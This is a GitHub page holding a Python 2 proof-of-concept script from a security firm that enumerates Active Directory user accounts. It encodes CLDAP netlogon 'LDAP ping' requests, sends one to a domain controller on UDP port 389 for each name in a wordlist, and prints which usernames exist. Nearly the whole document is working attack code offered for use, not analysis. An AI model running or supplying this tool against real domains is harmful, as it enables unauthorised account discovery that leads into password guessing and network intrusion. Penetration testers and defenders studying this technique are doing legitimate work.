-
Notifications
You must be signed in to change notification settings - Fork 43
/
UserEnum_LDAP.py
executable file
·142 lines (130 loc) · 4.25 KB
/
UserEnum_LDAP.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
#!/usr/bin/python2
#https://msdn.microsoft.com/en-us/library/cc223811.aspx
#https://github.com/samba-team/samba/blob/master/examples/misc/cldap.pl
#https://github.com/eerimoq/asn1tools/blob/master/tests/files/ietf/rfc4511.asn
from __future__ import print_function
from binascii import hexlify
import asn1tools
import socket
import sys
print ("UserEnum LDAP Ping POC - Reino Mostert/SensePost 2018")
if len(sys.argv)!=4:
print ("Usage: python UserEnum_LDAP.py DomainControlerIP DNSDomainName Userlist")
print ("Example: python UserEnum_LDAP.py 192.168.1.10 Contoso.com userlist.txt")
sys.exit()
SPECIFICATION = '''
Foo DEFINITIONS IMPLICIT TAGS ::= BEGIN
LDAPMessage3 ::= SEQUENCE {
messageID INTEGER,
protocolOp [APPLICATION 3] SEQUENCE {
baseObject OCTET STRING,
scope ENUMERATED {
baseObject (0),
singleLevel (1),
wholeSubtree (2),
...
},
derefAliases ENUMERATED {
neverDerefAliases (0),
derefInSearching (1),
derefFindingBaseObj (2),
derefAlways (3)
},
sizeLimit INTEGER,
timeLimit INTEGER,
typesOnly BOOLEAN,
filters [0] SEQUENCE {
filterDomain [3] SEQUENCE {
dnsdomattr OCTET STRING,
dnsdomval OCTET STRING
},
filterVersion [3] SEQUENCE {
ntverattr OCTET STRING,
ntverval OCTET STRING
},
filterUser [3] SEQUENCE {
userattr OCTET STRING,
userval OCTET STRING
},
filterAAC [3] SEQUENCE {
aacattr OCTET STRING,
aacval OCTET STRING
}
},
returntype SEQUENCE {
netlogon OCTET STRING
}
}
}
END
'''
response='''
Bar DEFINITIONS IMPLICIT TAGS ::= BEGIN
LDAPMessage4 ::=
SEQUENCE
{
messageID INTEGER,
protocolOp [APPLICATION 4] SEQUENCE
{
objectName OCTET STRING,
attributes SEQUENCE
{
partialAttribute SEQUENCE
{
type OCTET STRING,
vals SET {
value OCTET STRING
}
}
}
}
}
LDAPMessage5 ::= SEQUENCE {
messageID INTEGER,
protocolOp [APPLICATION 5] SEQUENCE {
resultCode ENUMERATED {
success (0),
operationsError (1)
},
matchedDN OCTET STRING,
diagnosticMessage OCTET STRING
}
}
END
'''
request_asn = asn1tools.compile_string(SPECIFICATION,'ber')
response_asn = asn1tools.compile_string(response,'ber')
f=open(sys.argv[3])
usernames=f.readlines();
f.close()
filterDomain = { 'dnsdomattr':'DnsDomain', 'dnsdomval':sys.argv[2] }
filterVersion = { 'ntverattr':'NtVer' , 'ntverval':'\x03\x00\x00\x00' }
filterUser = { 'userattr':'User', 'userval':''}
filterAAC = { 'aacattr':'AAC' , 'aacval':'\x10\x00\x00\x00' }
filters = { 'filterDomain':filterDomain,'filterVersion':filterVersion,'filterUser':filterUser,'filterAAC':filterAAC}
returntype= {'netlogon':'Netlogon'}
packet= { 'baseObject':'', 'scope': 'baseObject','derefAliases': 'neverDerefAliases','sizeLimit':0, 'timeLimit':0, 'typesOnly':0,'returntype':returntype,'filters':filters}
message = {'messageID':0, 'protocolOp':packet}
print ("[*] Starting ...")
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5.0)
for user in usernames:
user=user.rstrip();
message['protocolOp']['filters']['filterUser']['userval']=user
encoded = request_asn.encode('LDAPMessage3',message)
try:
s.sendto(encoded, (sys.argv[1], 389))
d = s.recvfrom(1024)
reply = d[0]
addr = d[1]
result=response_asn.decode('LDAPMessage4',reply)['protocolOp']['attributes']['partialAttribute']['vals']['value'][0]
if result==19:
print ("[+] " +user + " exist")
except asn1tools.codecs.DecodeTagError:
print ('[-] Error in decoding packet. This sometimes happen if the wrong domain name has been supplied. Ensure that its the FQDN, e.g. Contoso.com, and not just Contoso.')
pass
except socket.error as msg:
print ('[-] Error sending/receiving packets: ' + str(msg))
pass
#sys.exit()
print ("[*] Done ")